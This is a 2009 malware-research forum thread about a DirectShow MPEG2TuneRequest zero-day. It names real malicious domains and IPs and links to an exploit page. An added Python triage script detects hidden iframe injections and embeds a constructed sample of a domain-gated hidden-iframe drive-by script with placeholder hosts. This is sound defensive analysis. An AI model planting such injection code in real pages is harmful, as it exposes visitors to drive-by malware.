Malware Domain List

Malware Related => Tools of the trade / Internet News => Topic started by: SysAdMini on July 07, 2009, 07:20:29 am

Title: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: SysAdMini on July 07, 2009, 07:20:29 am
http://blog.trendmicro.com/zero-day-microsoft-directshow-mpeg2tunerequest-exploit-leads-to-killav-malware/
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: MysteryFCM on July 09, 2009, 08:29:33 pm
I thought I'd give you guys a quick analysis of what myb88.com/t.js (IP: 203.158.16.18), as mentioned by DNS-BH, actually does. The first thing we need to look at is the contents of t.js;

From here, we can see that it is loading an iFrame to bybyybyb.com (59.34.197.154 - AS4134), based on whether tmpdomain is equal to zero (which is based on whether or not the URL matches any of the items in the arydomain array). This iFrame then loads another iframe to index.htm which contains;

http://hphosts.blogspot.com/2009/07/myb88comtjs-quick-analysis.html
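The post above describes a script that checks the current URL against a list of domains (arydomain / tmpdomain) and, when there is no match, writes a hidden iframe pointing at a second host. The following Python is an added example for triaging such scripts, not code from the post, from hphosts, or from the real t.js: it scans JavaScript text for iframe tags emitted via document.write, reports the target host and whether the frame is sized or styled to be invisible, and pulls out the domain list the gate is built on. The sample script embedded in it is constructed for the example; the hostnames in it are placeholders under .invalid and .test, not the real ones.

```python
import re
from urllib.parse import urlparse

# Constructed sample script mirroring the structure described in the post
# (domain gate + hidden iframe). Hostnames are placeholders, not real IoCs.
SAMPLE_JS = r'''
var arydomain = new Array("example-allowed.test", "another.test");
var tmpdomain = 0;
for (var i = 0; i < arydomain.length; i++) {
  if (document.URL.indexOf(arydomain[i]) != -1) tmpdomain = 1;
}
if (tmpdomain == 0) {
  document.write('<iframe src="http://placeholder-injected.invalid/index.htm" width="0" height="0" frameborder="0"></iframe>');
}
'''

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'''([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))''')
WRITE_RE = re.compile(r'document\.write(?:ln)?\s*\(', re.IGNORECASE)


def parse_attrs(attr_text):
    """Turn the attribute part of a tag into a lower-cased dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        name = m.group(1).lower()
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[name] = value
    return attrs


def is_hidden(attrs):
    """True if the frame is sized to 0/1 px or styled invisible."""
    for dim in ("width", "height"):
        value = attrs.get(dim, "").strip().rstrip("px").strip()
        if value in ("0", "1"):
            return True
    style = attrs.get("style", "").lower().replace(" ", "")
    return "display:none" in style or "visibility:hidden" in style


def find_iframe_injections(js_text):
    """Return one record per <iframe> found in the script text."""
    findings = []
    for m in IFRAME_RE.finditer(js_text):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        # Look a short distance back to see if the tag sits inside a
        # document.write(...) call, the usual drive-by injection vector.
        window = js_text[max(0, m.start() - 200):m.start()]
        findings.append({
            "src": src,
            "host": host,
            "hidden": is_hidden(attrs),
            "via_document_write": bool(WRITE_RE.search(window)),
        })
    return findings


def extract_string_array(js_text, name):
    """Pull the string literals out of `name = new Array(...)` or `name = [...]`."""
    decl = re.compile(r'\b' + re.escape(name) + r'\s*=\s*(?:new\s+Array\s*\(|\[)(.*?)(?:\)|\])', re.S)
    m = decl.search(js_text)
    if not m:
        return []
    return [a or b for a, b in re.findall(r'"([^"]*)"|\'([^\']*)\'', m.group(1))]


if __name__ == "__main__":
    print("gate list:", extract_string_array(SAMPLE_JS, "arydomain"))
    for f in find_iframe_injections(SAMPLE_JS):
        print(f)
```

The two pieces of output are what an analyst wants from a script like this: the host the frame points at (to block or pivot on) and the domain list the gate uses, which explains why the injection may not fire when the page is fetched from a sandbox or a crawler whose URL happens to match.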
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: RS-232 on July 10, 2009, 05:28:52 am
Seems to be related to the exploit mentioned above,
kinda a proof-of-concept skiddie tool or so, but I didn't really bother checking it...
http://www.popsky.org/article/MPEG-2_0DAY_20090708012249.html
http://www.virustotal.com/analisis/cba86df44f23b3d980c60c2bc8f287a8d734dbbf4687214b363d6bc02f2e1bc4-1247203655
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: MysteryFCM on July 10, 2009, 06:04:29 am
NOD flagged it (the rar, as it was downloading) as the Statik trojan
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: RS-232 on July 10, 2009, 04:14:48 pm
The executable there appears to be multi-packed, at least from a very quick first look...
probably also the reason that some AVs reported "unknown packer" etc.

...Here's another interesting thread that I stumbled upon:
http://bbs.pediy.com/showthread.php?t=92912
Related to the domains mentioned in pediy's thread above:
http://blog.scansafe.com/journal/2009/7/7/china-attacks-worsen.html
Title: Re: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
Post by: RS-232 on July 11, 2009, 12:30:00 pm
http://milw0rm.com/exploits/9108